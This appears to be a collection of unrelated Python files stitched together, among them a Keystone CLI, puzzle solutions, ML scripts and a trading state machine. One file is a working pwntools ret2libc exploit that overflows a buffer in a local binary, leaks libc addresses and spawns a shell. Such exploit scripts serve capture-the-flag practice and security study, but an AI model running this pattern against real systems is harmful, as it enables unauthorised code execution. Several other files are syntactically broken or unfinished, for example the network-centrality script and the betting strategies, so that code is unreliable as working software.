# List projects associated to the endpoint group
columns = ('ID', 'Name', 'Description')
data = client.endpoint_filter.list_projects_for_endpoint_group(
endpoint_group=endpointgroup.id
)
elif project:
columns = ('ID', 'Name', 'Description')
data = client.endpoint_filter.list_endpoint_groups_for_project(
project=project.id
)
else:
columns = ('ID', 'Name', 'Description')
data = client.endpoint_groups.list()
return (
columns,
(
utils.get_item_properties(
s,
columns,
formatters={},
)
for s in data
),
)
class RemoveProjectFromEndpointGroup(command.Command):
_description = _("Remove project from endpoint group")
def get_parser(self, prog_name):
parser = super(RemoveProjectFromEndpointGroup, self).get_parser(
prog_name
)
parser.add_argument(
'endpointgroup',
metavar='<endpoint-group>',
help=_('Endpoint group (name or ID)'),
)
parser.add_argument(
'project',
metavar='<project>',
help=_('Project to remove (name or ID)'),
)
common.add_project_domain_option_to_parser(parser)
return parser
def take_action(self, parsed_args):
client = self.app.client_manager.identity
endpointgroup = utils.find_resource(
client.endpoint_groups, parsed_args.endpointgroup
)
project = common.find_project(
client, parsed_args.project, parsed_args.project_domain
)
client.endpoint_filter.delete_endpoint_group_from_project(
endpoint_group=endpointgroup.id, project=project.id
)
class SetEndpointGroup(command.Command, _FiltersReader):
_description = _("Set endpoint group properties")
def get_parser(self, prog_name):
parser = super(SetEndpointGroup, self).get_parser(prog_name)
parser.add_argument(
'endpointgroup',
metavar='<endpoint-group>',
help=_('Endpoint Group to modify (name or ID)'),
)
parser.add_argument(
'--name',
metavar='<name>',
help=_('New endpoint group name'),
)
parser.add_argument(
'--filters',
metavar='<filename>',
help=_('Filename that contains a new set of filters'),
)
parser.add_argument(
'--description',
metavar='<description>',
default='',
help=_('New endpoint group description'),
)
return parser
def take_action(self, parsed_args):
identity_client = self.app.client_manager.identity
endpointgroup = utils.find_resource(
identity_client.endpoint_groups, parsed_args.endpointgroup
)
filters = None
if parsed_args.filters:
filters = self._read_filters(parsed_args.filters)
identity_client.endpoint_groups.update(
endpointgroup.id,
name=parsed_args.name,
filters=filters,
description=parsed_args.description,
)
class ShowEndpointGroup(command.ShowOne):
_description = _("Display endpoint group details")
def get_parser(self, prog_name):
parser = super(ShowEndpointGroup, self).get_parser(prog_name)
parser.add_argument(
'endpointgroup',
metavar='<endpointgroup>',
help=_('Endpoint group (name or ID)'),
)
return parser
def take_action(self, parsed_args):
identity_client = self.app.client_manager.identity
endpoint_group = utils.find_resource(
identity_client.endpoint_groups, parsed_args.endpointgroup
)
info = {}
endpoint_group._info.pop('links')
info.update(endpoint_group._info)
return zip(*sorted(info.items()))
|
"""
sort the distinct chars arr first and put this in a queue
sort the numbers probably using a heap
"""
from heapq import heapify, heappop
from collections import Counter
class Solution:
def isPossibleDivide(self, nums: List[int], k: int) -> bool:
distinct_els = list(set(nums))
heapify(distinct_els)
counts = Counter(nums)
while distinct_els:
smallest = distinct_els[0]
for i in range(k):
counts[smallest+i] -= 1
if counts[smallest+i] < 0:
return False
# print(counts, distinct_els)
while counts[distinct_els[0]] == 0:
heappop(distinct_els)
if len(distinct_els) == 0:
return True
return True |
# Lab 9: Unit Converter
# This lab will involve writing a program that allows the user to convert a number between units.
print('Welcome to the distance converter!' + '\n')
# Version 1
# Ask the user for the number of feet, and print out the equivalent distance in meters. Hint: 1 ft is 0.3048 m. So we can get the output in meters by multiplying the input distance by 0.3048. Below is some sample input/output.
in_feet = int(input('What is the distance in feet? >'))
in_meters = in_feet * 0.3048
print(f'The distance is {in_meters} meters.')
# Version 2
# Allow the user to also enter the units. Then depending on the units, convert the distance into meters. The units we'll allow are feet, miles, meters, and kilometers.
# 1 ft is 0.3048 m, 1 mi is 1609.34 m, 1 m is 1 m, 1 km is 1000 m
meter_dict = {'ft': 0.3048, 'm': 1, 'mi': 1609.34, 'km': 1000}
chosen_unit = input('Would you like to convert ft, mi, m, or km?')
while chosen_unit not in meter_dict:
chosen_unit = input('what is the distance in ft, mi, m, or km? >')
in_num = int(input('How many?'))
print(f'That is {in_num * meter_dict[chosen_unit]} meters.')
#Version 3
# Add support for yards, and inches: 1 yard is 0.9144 m, 1 inch is 0.0254 m
# function to convert to meter
def convert_to_meters(input):
if user_in_unit == 'm':
return user_dist
elif user_in_unit == 'ft':
return user_dist * 0.3048
elif user_in_unit == 'mi':
return user_dist * 1609.34
elif user_in_unit == 'km':
return user_dist * 1000
elif user_in_unit == 'in':
return user_dist * 0.0254
elif user_in_unit == 'yd':
return user_dist * 0.9144
user_dist = float(input('How many units would you like to convert? > '))
user_in_unit = input('Would you like to convert km, mi, m, yd, in, or ft? > ')
print(f'{user_dist} {user_in_unit} is {convert_to_meters(user_dist)} meters.')
# Version 4
# Now we'll ask the user for the distance, the starting units, and the units to convert to.
# You can think of the values for the conversions as elements in a matrix, where the rows will be the units you're converting from, and the columns will be the units you're converting to. Along the horizontal, the values will be 1 (1 meter is 1 meter, 1 foot is 1 foot, etc).
user_dist = float(input('How many units would you like to convert? > '))
user_in_unit = input('What unit are you converting from: km, mi, m, yd, in, or ft? > ')
user_out_unit = input('What unit are you converting to: km, mi, m, yd, in, or ft? > ')
distance_in_meters = convert_to_meters(user_dist)
#function to convert from meters into other units
def convert_from_meters(distance_in_meters):
if user_out_unit == 'm':
return distance_in_meters
elif user_out_unit == 'ft':
return distance_in_meters / 0.3048
elif user_out_unit == 'mi':
return distance_in_meters / 1609.34
elif user_out_unit == 'km':
return distance_in_meters / 1000
elif user_out_unit == 'in':
return distance_in_meters / 0.0254
elif user_out_unit == 'yd':
return distance_in_meters / 0.9144
print(f'{user_dist} {user_in_unit} is {convert_from_meters(distance_in_meters)} {user_out_unit}.')
|
#!/usr/bin/env python3
"""Elementwise add two n-dimensional matrices"""
def add_matrices(mat1, mat2):
"""Recursively construct a new sum of two matrices"""
try:
if (len(mat1) != len(mat2)):
return None
newmat = []
for row1, row2 in zip(mat1, mat2):
newrow = add_matrices(row1, row2)
if newrow is None:
return None
newmat.append(newrow)
return newmat
except TypeError:
"""Should no longer be an iterable if we get here"""
return mat1 + mat2
|
import random
import cv2
import os
import argparse
import numpy as np
import torch
from detectron2.config import get_cfg
from contact_hands_two_stream import CustomVisualizer
from detectron2.data import MetadataCatalog
from contact_hands_two_stream import add_contacthands_config
from datasets import load_voc_hand_instances, register_pascal_voc
from contact_hands_two_stream.engine import CustomPredictor
from detectron2.modeling import build_model
from detectron2.data import MetadataCatalog
from detectron2.checkpoint import DetectionCheckpointer, PeriodicCheckpointer
class CustomPredictorTwoStream:
def __init__(self, cfg):
self.cfg = cfg.clone()
self.model = build_model(self.cfg)
self.model.eval()
self.metadata = MetadataCatalog.get(cfg.DATASETS.TEST[0])
checkpointer = DetectionCheckpointer(self.model)
checkpointer.load(cfg.MODEL.WEIGHTS)
self.input_format = cfg.INPUT.FORMAT
assert self.input_format in ["RGB", "BGR"], self.input_format
def __call__(self, original_image, model2):
with torch.no_grad():
if self.input_format == "RGB":
original_image = original_image[:, :, ::-1]
height, width = original_image.shape[:2]
image = torch.as_tensor(original_image.astype("float32").transpose(2, 0, 1))
inputs = {"image": image, "height": height, "width": width}
second_stream_outputs = inference_second_stream(model2, original_image)
predictions = self.model([inputs], second_stream_outputs)[0]
return predictions
def inference_second_stream(model, image):
outputs = model(image)
return outputs
def prepare_second_stream():
cfg2 = get_cfg()
cfg2.merge_from_file('./configs/second_stream.yaml')
cfg2.MODEL.WEIGHTS = "detectron2://COCO-InstanceSegmentation/mask_rcnn_R_101_FPN_3x/138205316/model_final_a3ec72.pkl"
model2 = CustomPredictor(cfg2)
return model2
def prepare_first_stream(cfg_file, weights, roi_score_thresh):
cfg1 = get_cfg()
add_contacthands_config(cfg1)
cfg1.merge_from_file(cfg_file)
cfg1.MODEL.ROI_HEADS.SCORE_THRESH_TEST = roi_score_thresh
cfg1.MODEL.WEIGHTS = weights
model1 = CustomPredictorTwoStream(cfg1)
return model1
def add_legend(im):
cyan, magenta, red, yellow = (255, 255, 0), (255, 0, 255), (0, 0, 255), (0, 255, 255)
labels = ["No", "Self", "Person", "Object"]
map_idx_to_color = {}
map_idx_to_color[0], map_idx_to_color[1], map_idx_to_color[2], map_idx_to_color[3] = \
cyan, magenta, red, yellow
font = cv2.FONT_HERSHEY_SIMPLEX
h, w = im.shape[:2]
image = 255*np.ones((h+50, w, 3), dtype=np.uint8)
image[:h, :w, :] = im
h, w = image.shape[:2]
offset = 0
for itr, word in enumerate(labels):
offset += int(w / len(labels)) - 50
cv2.putText(image, word, (offset, h-15), font, 1, map_idx_to_color[itr], 3)
return image
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Arguments for evaluation')
parser.add_argument('--image_dir', required=True, metavar='path to images', help='path to images')
parser.add_argument('--ROI_SCORE_THRESH', required=False, metavar='threshold for hand detections', \
help='hand detection score threshold', default=0.7)
parser.add_argument('--sc', required=False, metavar='threshold for self-contact',
help='threshold for self-contact', default=0.5)
parser.add_argument('--pc', required=False, metavar='threshold for person-contact',
help='threshold for self-contact', default=0.3)
parser.add_argument('--oc', required=False, metavar='threshold for object-contact',
help='threshold for self-contact', default=0.6)
args = parser.parse_args()
images_path = args.image_dir
roi_score_thresh = float(args.ROI_SCORE_THRESH)
sc_thresh = float(args.sc)
pc_thresh = float(args.pc)
oc_thresh = float(args.oc)
contact_thresh = [0.5, sc_thresh, pc_thresh, oc_thresh]
# if the scores for all contact states is less than corresponding thresholds, No-Contact is predicted; 0.5 is dummy here, it is not used.
model2 = prepare_second_stream()
model1 = prepare_first_stream('./configs/ContactHands.yaml', './models/combined_data_model.pth', roi_score_thresh)
images = sorted(os.listdir(images_path))
count = 0
for img in images:
count += 1
print(count)
im = cv2.imread(os.path.join(images_path, img))
height, width = im.shape[0], im.shape[1]
ratio = height / width
im = cv2.resize(im, (720, int(720*ratio)))
outputs = model1(im, model2)
v = CustomVisualizer(im[:, :, ::-1], MetadataCatalog.get("ContactHands_test"), scale=1, scores_thresh=contact_thresh)
v = v.draw_instance_predictions(outputs["instances"].to("cpu"))
out_im = add_legend(v.get_image()[:, :, ::-1])
cv2.imwrite('./results/res_' + img, out_im)
|
class Value:
def getAddNum(self):
global val_in_mem
a = input("Enter the first number that you want to add: \n")
if a == 'mrc':
a = float(val_in_mem)
else:
a = float(a)
b = input("Enter the second number that you want to add: \n")
if b == 'mrc':
b = float(val_in_mem)
else:
b = float(b)
return a, b
def getSubNum(self):
global val_in_mem
a = input("Enter the first number that you want to subtract: \n")
if a == 'mrc':
a = float(val_in_mem)
else:
a = float(a)
b = input("Enter the second number that you want to subtract: \n")
if b == 'mrc':
b = float(val_in_mem)
else:
b = float(b)
return a, b
def getMultiNum(self):
global val_in_mem
a = input("Enter the first number that you want to multiply: \n")
if a == 'mrc':
a = float(val_in_mem)
else:
a = float(a)
b = input("Enter the second number that you want to multiply: \n")
if b == 'mrc':
b = float(val_in_mem)
else:
b = float(b)
return a, b
def getDivNum(self):
global val_in_mem
a = input("Enter the first number that you want to divide: \n")
if a == 'mrc':
a = float(val_in_mem)
else:
a = float(a)
b = input("Enter the second number that you want to divide: \n")
if b == 'mrc':
b = float(val_in_mem)
else:
b = float(b)
return a, b
def getSquared(self):
global val_in_mem
a = input("Enter the number that you want to square: \n")
if a == 'mrc':
a = float(val_in_mem)
else:
a = float(a)
return a
def getRoot(self):
global val_in_mem
a = input("Enter the number that you want to find the square root of : \n")
if a == 'mrc':
a = float(val_in_mem)
else:
a = float(a)
return a
def getExponent(self):
global val_in_mem
a = input("Enter the base number : \n")
if a == 'mrc':
a = float(val_in_mem)
else:
a = float(a)
b = input("Enter the exponent number : \n")
if b == 'mrc':
b = float(val_in_mem)
else:
b = float(b)
return a, b |
import json
def get_params():
with open('pipeline_params.json') as json_file:
data = json.load(json_file)
return data
|
#!/usr/bin/env python
# Copyright (c) 2011 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Verifies that a failing postbuild step lets the build fail.
"""
from __future__ import print_function
import sys
import TestGyp
from XCodeDetect import XCodeDetect
# set |match| to ignore build stderr output.
test = TestGyp.TestGyp(formats=['ninja', 'make', 'xcode'], match=lambda a, b: True, platforms=['darwin'])
if XCodeDetect.Version()[0] == '3':
print('Skip test on XCode 3')
sys.exit(2)
test.run_gyp('test.gyp', chdir='postbuild-fail')
build_error_code = {
'xcode': [1, 65], # 1 for xcode 3, 65 for xcode 4 (see `man sysexits`)
'make': 2,
'ninja': 1,
'xcode-ninja': [1, 65],
}[test.format]
# If a postbuild fails, all postbuilds should be re-run on the next build.
# In Xcode 3, even if the first postbuild fails the other postbuilds were
# still executed. In Xcode 4, postbuilds are stopped after the first
# failing postbuild. This test checks for the Xcode 4 behavior.
# Non-bundles
test.build('test.gyp', 'nonbundle', chdir='postbuild-fail', status=build_error_code)
test.built_file_must_not_exist('static_touch', chdir='postbuild-fail')
# Check for non-up-to-date-ness by checking if building again produces an
# error.
test.build('test.gyp', 'nonbundle', chdir='postbuild-fail', status=build_error_code)
# Bundles
test.build('test.gyp', 'bundle', chdir='postbuild-fail', status=build_error_code)
test.built_file_must_not_exist('dynamic_touch', chdir='postbuild-fail')
# Check for non-up-to-date-ness by checking if building again produces an
# error.
test.build('test.gyp', 'bundle', chdir='postbuild-fail', status=build_error_code)
test.pass_test()
|
class BetOnLoserStrategy(object):
def strategy(self,*args):
'''
Always bets 1 token monney to the loser, which is the player 'b'
'''
return 1, 'b'
class BetOnWinnerStrategy(object):
def strategy(self,model_odds_player_a, model_odds_player_b,
average_betting_exchange_odds_a, average_betting_exchange_odds_b,
*args):
return 1, 'a'
class RecordDatesStrategy(object):
def __init__(self):
self.dates = []
def strategy(self,model_odds_player_a, model_odds_player_b,
average_betting_exchange_odds_a, average_betting_exchange_odds_b,
match):
assert all(map(lambda date: date <= match['Date'], self.dates))
self.dates.append(match['Date'])
return 0, 'a'
class BetIfBetterOddsForPredictedWinner(object):
def strategy(*args):
model_predicted_winner_odds = 0
bet_exchange_predicted_winner_odds = 0
if bet_exchange_predicted_winner_odds > model_predicted_winner_odds:
return 1,'a'
else:
return 0, '0'
class KellyCriterion(object):
def strategy(*args):
# Calculate things below from argumets
average_winning_odds = 0
winnin_prob = 0
losing_prob = 1 - winnin_prob
bet = (winnin_prob*(average_winning_odds + 1) - 1)/average_winning_odds
class AlternateBettingStrategy(object):
def __init__(self):
self.oddity = 0
def strategy(*args):
choice = 'a' if self.oddity == 1 else 'b'
self.oddity = (self.oddity + 1) % 2
bet = 10**(-6)
return bet, choice
class NeverBetStrategy(object):
def strategy(*args):
return 0, 'b'
|
"""
9. 回文数
判断一个整数是否是回文数。回文数是指正序(从左向右)和倒序(从右向左)读都是一样的整数。
示例 1:
输入: 121
输出: true
示例 2:
输入: -121
输出: false
解释: 从左向右读, 为 -121 。 从右向左读, 为 121- 。因此它不是一个回文数。
示例 3:
输入: 10
输出: false
解释: 从右向左读, 为 01 。因此它不是一个回文数。
进阶:
你能不将整数转为字符串来解决这个问题吗?
date : 11-13-2020
"""
class Solution:
def isPalindrome(self, x: int) -> bool:
return str(x) == str(x)[::-1]
print(Solution().isPalindrome(123))
print(Solution().isPalindrome(112211))
print(Solution().isPalindrome(-11211))
# x = 123
# s = str(x)
# print(reversed(s))
|
#!/usr/bin/env python
import pwn
libc = pwn.ELF('libc.so')
elf_Demo = pwn.ELF('Demo')
attack = pwn.process('./Demo')
# attack = remote('127.0.0.1', 23333)
plt_write = elf_Demo.symbols['write']
print '###### plt_write = ' + hex(plt_write)
got_write = elf_Demo.got['write']
print '###### got_write = ' + hex(got_write)
overflow_addr = 0x08048471
print '###### overflow_addr = ' + hex(overflow_addr)
payload = 140 * 'a'
payload += pwn.p32(plt_write)
payload += pwn.p32(overflow_addr)
payload += pwn.p32(1)
payload += pwn.p32(got_write)
payload += pwn.p32(4)
print "[1] Sending payload"
attack.send(payload)
print "[2] Receiving addr_write"
addr_write = pwn.u32(attack.recv(4))
print 'addr_write = ' + hex(addr_write)
print "[3] Calculating addr_system and addr_binsh"
addr_system = addr_write - (libc.symbols['write'] - libc.symbols['system'])
print 'addr_system = ' + hex(addr_system)
addr_binsh = addr_write - (libc.symbols['write'] - next(libc.search('/bin/sh')))
print 'addr_binsh = ' + hex(addr_binsh)
payload_final = 140 * 'a'
payload_final += pwn.p32(addr_system)
payload_final += pwn.p32(overflow_addr)
payload_final += pwn.p32(addr_binsh)
print "[4] Sending payload_final"
attack.send(payload_final)
attack.interactive()
|
import pandas
df = pandas.read_csv("sin_dataset.csv")
power_d = 0
power_c = 0
power_b = 0
node_d = ""
node_c = ""
node_b = ""
find_current_powers()
link_prediction()
def find_current_powers():
power_d = degree_centrality()
#power_c = closeness_centrality()
#power_b = betweenness_centrality()
message = "The initial power centers are: "
printer(message)
def current_indian_power():
power_d = degree_centrality(india)
#power_c = closeness_centrality(india)
#power_b = betweenness_centrality(india)
message = "The centraility of India is: "
printer(message)
def link_prediction():
india = 8
len = 23
for fix in range(0:len):
if fix == india:
continue
else if fix >= 1:
if df[india,fix] == 1:
continue
else:
df[india,fix]=1
fixed = 1
for col in range(1:len):
if col == india:
continue
if df[india,col]==1:
continue
else:
df[india,col]=1
find_new_powers(india,col,fix)
df[india,col]=0
if fixed == 1:
df[india,fix] = 0
#changed_powers()
def find_new_powers(india,col,fix):
power_d = degree_centrality(india)
#power_c = closeness_centrality(india)
#power_b = betweenness_centrality(india)
message = "Case:"+counter+" If india makes relations with "
if fix == 0:
#do this
message = message + df[0,col].toString()
else:
#do that
message = message + df[0,col].toString + "and" + df[0,fix].toString
message = ", its new centrality will be: "
printer(message)
def changed_powers():
d = power_d
#c = power_c
#b = power_c
power_d = degree_centrality()
#power_c = closeness_centrality()
#power_b = betweenness_centrality()
message = "If India does so, the power centers of the world will change to: "
printer(message)
def printer(message):
print(message)
print("Degree centrality = "+power+" of node "+node_d)
#print("Closeness centrality = "+power+" of node "+node_c)
#print("Betweenness centrality = "+power+" of node "+node_b)
def degree_centrality():
#print max degree
#print column header of max sum
def degree_centrality(india):
#print india's degree
#print col sum of india |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Feb 24 17:33:38 2019
@author: chenhaibin
"""
import time
import matplotlib.pyplot as plt
import seaborn as sns
import numpy as np
import pandas as pd
import lightgbm as lgb
from sklearn.model_selection import StratifiedKFold
from sklearn.preprocessing import LabelEncoder
#input
train_data = pd.read_csv("train_dataset.csv")
test_data = pd.read_csv("test_dataset.csv")
#feature_engineering
train_data.columns = ['uid','true_name_flag','age','is_uni_student_flag','black_list_flag',\
'4g_unhealth_flag','net_age_till_now','top_up_month_diff','top_up_amount',\
'recent_6month_avg_use','total_account_fee','curr_month_balance',\
'curr_overdue_flag','cost_sensitivity','connect_num','freq_shopping_flag',\
'recent_3month_shopping_count','wanda_flag','sam_flag','movie_flag',\
'tour_flag','sport_flag','online_shopping_count','express_count',\
'finance_app_count','video_app_count','flight_count','train_count',\
'tour_app_count','score']
test_data.columns = train_data.columns[:-1]
#去掉5个最没用的特征
train_data_use = train_data.drop(['uid','score','is_uni_student_flag','true_name_flag','sam_flag','black_list_flag','wanda_flag'], axis=1)
test_data_use = test_data.drop(['uid','is_uni_student_flag','true_name_flag','sam_flag','black_list_flag','wanda_flag'], axis=1)
#入网年龄 降了0.01
def get_begin_age(a, b):
return a - b / 12
train_data['net_age_begin'] = train_data.apply(lambda row: get_begin_age(row['age'], row['net_age_till_now']), axis=1)
def pay_remain_ratio(a,b):
if b == 0:
return 0
else:
return a / b
#扣钱后剩的钱和月费用的比例
train_data['after_pay_remain_ratio'] = train_data.apply(lambda row: pay_remain_ratio(row['curr_month_balance'],row['total_account_fee']), axis=1)
#扣钱后剩的钱和平均消费的比例
train_data['after_pay_remain_average_ratio'] = train_data.apply(lambda row: pay_remain_ratio(row['curr_month_balance'],row['recent_6month_avg_use']), axis=1)
#下面这里都是全部除一遍就完事了
train_data['after_pay_remain_average_ratio'] = train_data.apply(lambda row: pay_remain_ratio(row['top_up_amount'],row['recent_6month_avg_use']), axis=1)
train_data['after_pay_remain_average_ratio'] = train_data.apply(lambda row: pay_remain_ratio(row['total_account_fee'],row['recent_6month_avg_use']), axis=1)
train_data['after_pay_remain_average_ratio'] = train_data.apply(lambda row: pay_remain_ratio(row['top_up_amount'],row['curr_month_balance']), axis=1)
train_data['after_pay_remain_average_ratio'] = train_data.apply(lambda row: pay_remain_ratio(row['total_account_fee'],row['top_up_amount']), axis=1)
train_data['charge_online'] = train_data['top_up_amount'].apply(lambda x: 1 if x % 1 != 0 else 0)
#计数特征
def feature_count(data, features=[]):
if len(set(features)) != len(features):
print('equal feature !!!!')
return data
new_feature = 'count'
for i in features:
new_feature += '_' + i.replace('add_', '')
try:
del data[new_feature]
except:
pass
temp = data.groupby(features).size().reset_index().rename(columns={0: new_feature})
data = data.merge(temp, 'left', on=features)
return data
train_data = feature_count(train_data, ['top_up_amount'])
train_data = feature_count(train_data, ['net_age_till_now']) #go
train_data = feature_count(train_data, ['age']) #go
train_data = feature_count(train_data, ['top_up_month_diff'])
train_data = feature_count(train_data, ['connect_num']) #go
train_data['diff_between_average_acount'] = train_data['recent_6month_avg_use'] - train_data['total_account_fee']
train_data['diff_between_average_up'] = train_data['recent_6month_avg_use'] - train_data['top_up_amount']
train_data['diff_between_curr_up'] = train_data['curr_month_balance'] - train_data['top_up_amount']
train_data['diff_between_fee_up'] = train_data['total_account_fee'] - train_data['top_up_amount']
train_data['diff_between_curr_up'] = train_data['curr_month_balance'] - train_data['top_up_amount']
train_data['diff_between_average_up'] = train_data['curr_month_balance'] - train_data['recent_6month_avg_use']
#average
train_data['mean_fee'] = (train_data['recent_6month_avg_use'] - train_data['total_account_fee']) / 2
#parameter
'''
params = {
'learning_rate': 0.01,
'boosting_type': 'gbdt',
'objective': 'regression_l1',
'metric': 'mae',
'feature_fraction': 0.6,
'bagging_fraction': 0.8,
'bagging_freq': 2,
'num_leaves': 31,
'verbose': -1,
'max_depth': 5,
'lambda_l2': 5, 'lambda_l1': 0
}
'''
params = {
'learning_rate': 0.01,
'boosting_type': 'gbdt',
'objective': 'regression_l1',
'metric': 'mae',
'max_depth': 5,
'num_leaves': 27,
'min_sum_hessian_in_leaf': 0.0001,
'min_data_in_leaf': 24
}
min_merror = float('Inf')
best_params = {}
train_label = train_data['score']
train_data = lgb.Dataset(train_data_use, train_label, silent=True)
'''
print("调参1:提高准确率")
min_merror = float('Inf')
#for max_depth in range(3,7,1):
#for num_leaves in range(10,60,3):
for max_depth in range(4,7,1):
for num_leaves in range(25,35,2):
params['num_leaves'] = num_leaves
params['max_depth'] = max_depth
cv_results = lgb.cv(params,
train_data,
seed=89,
early_stopping_rounds=100,
verbose_eval=True,
num_boost_round=10000 #默认10
)
mean_merror = pd.Series(cv_results['l1-mean']).min()
if mean_merror < min_merror:
min_merror = mean_merror
best_params['num_leaves'] = num_leaves
best_params['max_depth'] = max_depth
params['num_leaves'] = best_params['num_leaves']
params['max_depth'] = best_params['max_depth']
print(best_params)
print('best n_estimators:', len(cv_results['l1-mean']))
print('best cv score:', cv_results['l1-mean'][-1])
'''
'''
{'num_leaves': 27, 'max_depth': 5}
best n_estimators: 3650
best cv score: 14.788533076
'''
'''
print("调参2:降低过拟合")
for min_sum_hessian_in_leaf in [1e-4,1e-3,1e-2]:
for min_data_in_leaf in range(12,32,4):
#for min_sum_hessian_in_leaf in [1e-3]:
#for min_data_in_leaf in range(20,21,1):
params['min_sum_hessian_in_leaf'] = min_sum_hessian_in_leaf
params['min_data_in_leaf'] = min_data_in_leaf
cv_results = lgb.cv(
params,
train_data,
seed=89,
early_stopping_rounds=100,
verbose_eval=True,
num_boost_round=10000
)
mean_merror = pd.Series(cv_results['l1-mean']).min()
boost_rounds = pd.Series(cv_results['l1-mean']).idxmin()
if mean_merror < min_merror:
min_merror = mean_merror
best_params['min_sum_hessian_in_leaf']= min_sum_hessian_in_leaf
best_params['min_data_in_leaf'] = min_data_in_leaf
params['min_data_in_leaf'] = best_params['min_data_in_leaf']
params['min_sum_hessian_in_leaf'] = best_params['min_sum_hessian_in_leaf']
print(best_params)
print('best n_estimators:', len(cv_results['l1-mean']))
print('best cv score:', cv_results['l1-mean'][-1])
'''
'''
{'min_sum_hessian_in_leaf': 0.0001, 'min_data_in_leaf': 24}
best n_estimators: 2921
best cv score: 14.7871626736
'''
print("调参3:降低过拟合")
for feature_fraction in [0.5,0.6,0.7]:
for bagging_fraction in [0.7,0.8,0.9]:
for bagging_freq in range(0,5,1):
params['feature_fraction'] = feature_fraction
params['bagging_fraction'] = bagging_fraction
params['bagging_freq'] = bagging_freq
cv_results = lgb.cv(
params,
train_data,
seed=89,
early_stopping_rounds=100,
verbose_eval=True,
num_boost_round=10000
)
mean_merror = pd.Series(cv_results['l1-mean']).min()
boost_rounds = pd.Series(cv_results['l1-mean']).idxmin()
if mean_merror < min_merror:
min_merror = mean_merror
best_params['feature_fraction'] = feature_fraction
best_params['bagging_fraction'] = bagging_fraction
best_params['bagging_freq'] = bagging_freq
params['feature_fraction'] = best_params['feature_fraction']
params['bagging_fraction'] = best_params['bagging_fraction']
params['bagging_freq'] = best_params['bagging_freq']
print(best_params)
print('best n_estimators:', len(cv_results['l1-mean']))
print('best cv score:', cv_results['l1-mean'][-1])
'''
cv_pred = np.zeros(test_data.shape[0])
valid_best_l2_all = 0
feature_importance_df = pd.DataFrame()
count = 0
for i, (train_fold, validate) in enumerate(kf):
print('fold: ',i, ' training')
X_train, X_validate, label_train, label_validate = \
train_data_use.iloc[train_fold, :], train_data_use.iloc[validate, :], \
train_label[train_fold], train_label[validate]
dtrain = lgb.Dataset(X_train, label_train)
dvalid = lgb.Dataset(X_validate, label_validate, reference=dtrain)
bst = lgb.train(params, dtrain, num_boost_round=10000, valid_sets=dvalid, verbose_eval=-1,early_stopping_rounds=50)
cv_pred += bst.predict(test_data_use, num_iteration=bst.best_iteration)
valid_best_l2_all += bst.best_score['valid_0']['l1']
fold_importance_df = pd.DataFrame()
fold_importance_df["feature"] = list(X_train.columns)
fold_importance_df["importance"] = bst.feature_importance(importance_type='gain', iteration=bst.best_iteration)
fold_importance_df["fold"] = count + 1
feature_importance_df = pd.concat([feature_importance_df, fold_importance_df], axis=0)
count += 1
cv_pred /= NFOLDS
valid_best_l2_all /= NFOLDS
print('cv score for valid is: ', 1/(1+valid_best_l2_all))
''' |
# Copyright 2018 QuantInsti Quantitative Learnings Pvt Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
"""
from transitions import Machine
from blueshift.utils.decorators import blueprint
from blueshift.utils.types import MODE, STATE
from blueshift.configs.runtime import blueshift_run_get_name
@blueprint
class AlgoStateMachine():
"""
An implementation of state machine rules for an algorithm. States
changes are triggered by two sets of events. One is the clock tick.
The second is any command from channel (i.e. user interaction,
only for live mode).
Note:
Clock transitions: ignoring state altering commands, any
backtest can move like dormant -> startup -> before trading
start -> trading bar -> after trading hours -> dromant.
For a live algo, if started on a trading hour, it will be
dormant -> startup -> before trading start -> trading bar ->
after trading hours -> heartbeat -> before trading -> trading
bar -> after trading hours -> heartbeat and so on. If started
on a non-trading hour, it can jump from initialize to heartbeat.
So dormant -> initialize -> hearbeat -> before start -> heart
beat -> trading bars -> after trading -> hearbeat and so on.
On stop from any signal it goes to `stopped` state.
Args:
``name (str)``: A name for the state machine
``mode (int)``: Mode of the machine (live or backtest)
"""
states = [s for s, v in STATE.__members__.items()]
""" complete set of possible machine states. """
def __init__(self, *args, **kwargs):
self.name = kwargs.pop("name",blueshift_run_get_name())
self.mode = kwargs.pop("mode", MODE.BACKTEST)
self._paused = False
transitions = [
{'trigger':'fsm_initialize','source':'STARTUP','dest':'INITIALIZED'},
{'trigger':'fsm_before_trading_start','source':'HEARTBEAT','dest':'BEFORE_TRADING_START'},
{'trigger':'fsm_before_trading_start','source':'INITIALIZED','dest':'BEFORE_TRADING_START'},
{'trigger':'fsm_before_trading_start','source':'AFTER_TRADING_HOURS','dest':'BEFORE_TRADING_START'},
{'trigger':'fsm_handle_data','source':'BEFORE_TRADING_START','dest':'TRADING_BAR'},
{'trigger':'fsm_handle_data','source':'HEARTBEAT','dest':'TRADING_BAR'},
{'trigger':'fsm_handle_data','source':'TRADING_BAR','dest':'TRADING_BAR'},
{'trigger':'fsm_after_trading_hours','source':'TRADING_BAR','dest':'AFTER_TRADING_HOURS'},
{'trigger':'fsm_after_trading_hours','source':'HEARTBEAT','dest':'AFTER_TRADING_HOURS'},
{'trigger':'fsm_heartbeat','source':'AFTER_TRADING_HOURS','dest':'HEARTBEAT'},
{'trigger':'fsm_heartbeat','source':'BEFORE_TRADING_START','dest':'HEARTBEAT'},
{'trigger':'fsm_heartbeat','source':'INITIALIZED','dest':'HEARTBEAT'},
{'trigger':'fsm_heartbeat','source':'HEARTBEAT','dest':'HEARTBEAT'},
{'trigger':'fsm_heartbeat','source':'TRADING_BAR','dest':'HEARTBEAT'},
{'trigger':'fsm_analyze','source':'*','dest':'STOPPED'},
{'trigger':'fsm_pause','source':'*','dest':'PAUSED'}]
self.machine = Machine(model=self,
states=AlgoStateMachine.states,
transitions=transitions,
initial="STARTUP")
self.machine.add_transition('fsm_pause','*','PAUSED',
conditions = 'is_running',
after='set_pause')
self.machine.add_transition('fsm_resume','PAUSED','STARTUP',
before='reset_pause')
self.machine.add_transition('fsm_stop','*','STOPPED')
def is_running(self):
""" returns True if we are in a running state """
return not self._paused
def set_pause(self):
